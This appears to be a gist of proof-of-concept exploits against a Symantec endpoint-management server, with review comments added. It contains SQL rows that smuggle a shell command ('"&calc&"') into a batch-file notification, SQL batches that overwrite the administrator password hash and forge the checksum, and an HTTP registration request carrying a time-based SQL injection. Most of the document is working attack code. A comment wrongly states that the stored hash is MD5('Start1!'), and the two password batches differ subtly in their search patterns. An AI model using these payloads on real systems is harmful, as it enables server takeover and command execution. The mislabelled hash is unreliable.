@mwulftange
Last active February 24, 2016 17:32
C:\>cacls C:\ProgramData\Symantec\SyKnAppS\Updates
C:\ProgramData\Symantec\SyKnAppS\Updates NT AUTHORITY\SYSTEM:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
-- Proof-of-concept rows: one alert, one notification and one virus-name entry,
-- tied together by the placeholder keys 'AAAA...', 'BBBB...' and 'CCCC...'.
-- The notification row sets email = 'batchfile' and batch_file_name =
-- 'dbtools.bat', and its virus column holds a value containing the shell
-- metacharacters '"' and '&'.
-- NOTE(review): presumably the product hands the virus name to the batch file
-- when the notification fires -- confirm against the product. Defensive
-- takeaway: values read from the database must reach child processes as
-- discrete arguments (no shell or batch interpolation), and rows in
-- notification that reference a batch file deserve change auditing.
INSERT INTO alerts (idx, alert_idx, virusname_idx, alertinserttime)
VALUES ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 1, 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', CURRENT_TIMESTAMP);
-- user_id is taken from whichever adminuser row TOP 1 returns (no ORDER BY).
INSERT INTO notification (notag_idx, type, user_id, virus, email, lastrun, triggered, batch_file_name)
VALUES ('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', 'NV', (SELECT TOP 1 user_id FROM adminuser), '"&calc&"', 'batchfile', 0, 0, 'dbtools.bat');
-- Copies the notification's virus value into virus.virusname under the key
-- that the alert row above references.
INSERT INTO virus (virusname_idx, virusname)
VALUES ('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', (SELECT virus FROM notification WHERE notag_idx = 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'));
-- reset admin password
-- Loads the content of one basic_metadata row as text, edits the
-- <SemAdministrator> element inside it, and writes the result back.
-- The only textual change is the REPLACE below: it removes the fixed
-- PasswordHash attribute and renames the attribute that follows it from
-- OldPasswordHash back to PasswordHash, so the previously stored hash is
-- active again.
-- NOTE(review): for defenders, the point is that the administrator credential
-- lives as a bare 32-hex-digit hash inside a database blob, so anyone with
-- write access to this table controls console logins. Audit writes to
-- basic_metadata and restrict the database account the application uses.
BEGIN
DECLARE
@SemConfigRoot varchar(max),
@s varchar(max),
@start bigint,
@length bigint;
-- The assignments below depend on each other in the order listed.
SELECT
-- content is cast through varbinary(max) to get the document as text.
@SemConfigRoot = CONVERT(varchar(max),CONVERT(varbinary(max),content)),
-- Locate the administrator element; + 18 extends the span over the closing tag.
@start = PATINDEX('%<SemAdministrator %', @SemConfigRoot),
@length = PATINDEX('%</SemAdministrator>%', @SemConfigRoot) - @start + 18,
@s = SUBSTRING(@SemConfigRoot, @start, @length),
@s = REPLACE(@s, ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash=', ' PasswordHash='),
-- Splice the edited element back over the original span.
@SemConfigRoot = STUFF(@SemConfigRoot, @start, @length, @s)
FROM
basic_metadata
WHERE
id = 'B655E64D0A320801000000E164041B79';
UPDATE
basic_metadata
SET
content = CONVERT(image,CONVERT(varbinary(max),@SemConfigRoot)),
-- The checksum column is recomputed as the uppercase hex MD5 of the new
-- content. An unkeyed digest stored next to the data it covers cannot reveal
-- tampering by anyone able to write the row.
checksum = UPPER(SUBSTRING(master.dbo.fn_varbintohexstr(HASHBYTES('MD5',@SemConfigRoot)),3,32))
WHERE
id = 'B655E64D0A320801000000E164041B79';
END;
<SemAdministrator
CreationTime="1450248162172"
EmailAddress="admin@localhost.local"
Id="AF3C39A10A320801000000DBF200C60A"
Name="admin"
PasswordHash="21232F297A57A5A743894A0E4A801FC3"
_d="false"
_i="6F335DE8C0A80101003F6843927F3521"
_t="1450248162172"
_v="3">
POST /servlet/AgentServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 781
ActionType=AgentRegister&RequestData=<SSARegData NameSpace="rpc">
<AgentInfo
DomainID="7C6968400A32025E01DF280BC7C27AE0"
AgentType="AgentType"
AgentID="AgentID"
LegacyAgentID="LegacyAgentID"
HardwareKey="lala'; waitfor delay '00:00:03'--"
UserDomain="UserDomain"
LoginUser="LoginUser"
ComputerDomain="ComputerDomain"
ComputerName="ComputerName"
PreferredGroup="PreferredGroup"
PreferredMode="0"
SiteDomainName="SiteDomainName"
IsLicensed="1"
AgentPlatform="AgentPlatform"
/>
</SSARegData>
-- set new admin password: MD5('Start1!') = '21232F297A57A5A743894A0E4A801FC3'
-- NOTE(review): verify the plaintext stated above independently. The digest is
-- an unsalted MD5, and this value appears in public hash lookup tables.
-- Loads the content of one basic_metadata row as text, edits the
-- <SemAdministrator> element inside it, and writes the result back.
-- The first REPLACE undoes an earlier run of this batch so that re-running it
-- does not stack attributes. The second puts the fixed hash in as PasswordHash
-- and relabels the existing hash as OldPasswordHash, keeping the original
-- value in the document.
-- NOTE(review): for defenders, an unexpected OldPasswordHash attribute on the
-- administrator element, or a content/checksum change on this row outside a
-- maintenance window, is worth alerting on. Salted, slow password hashing and
-- a least-privilege database account would limit the impact of database write
-- access.
BEGIN
DECLARE
@SemConfigRoot varchar(max),
@s varchar(max),
@start bigint,
@length bigint;
-- The assignments below depend on each other in the order listed.
SELECT
-- content is cast through varbinary(max) to get the document as text.
@SemConfigRoot = CONVERT(varchar(max),CONVERT(varbinary(max),content)),
@start = PATINDEX('<SemAdministrator %', @SemConfigRoot),
@length = PATINDEX('</SemAdministrator>%', @SemConfigRoot) - @start + 18,
@s = SUBSTRING(@SemConfigRoot, @start, @length),
@s = REPLACE(@s, ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash=', ' PasswordHash='),
@s = REPLACE(@s, ' PasswordHash=', ' PasswordHash="21232F297A57A5A743894A0E4A801FC3" OldPasswordHash='),
-- Splice the edited element back over the original span.
@SemConfigRoot = STUFF(@SemConfigRoot, @start, @length, @s)
FROM
basic_metadata
WHERE
ID = 'B655E64D0A320801000000E164041B79';
UPDATE
basic_metadata
SET
content = CONVERT(image,CONVERT(varbinary(max),@SemConfigRoot)),
-- The checksum column is recomputed as the uppercase hex MD5 of the new
-- content. An unkeyed digest stored next to the data it covers cannot reveal
-- tampering by anyone able to write the row.
checksum = UPPER(SUBSTRING(master.dbo.fn_varbintohexstr(HASHBYTES('MD5',@SemConfigRoot)),3,32))
WHERE
id = 'B655E64D0A320801000000E164041B79';
END;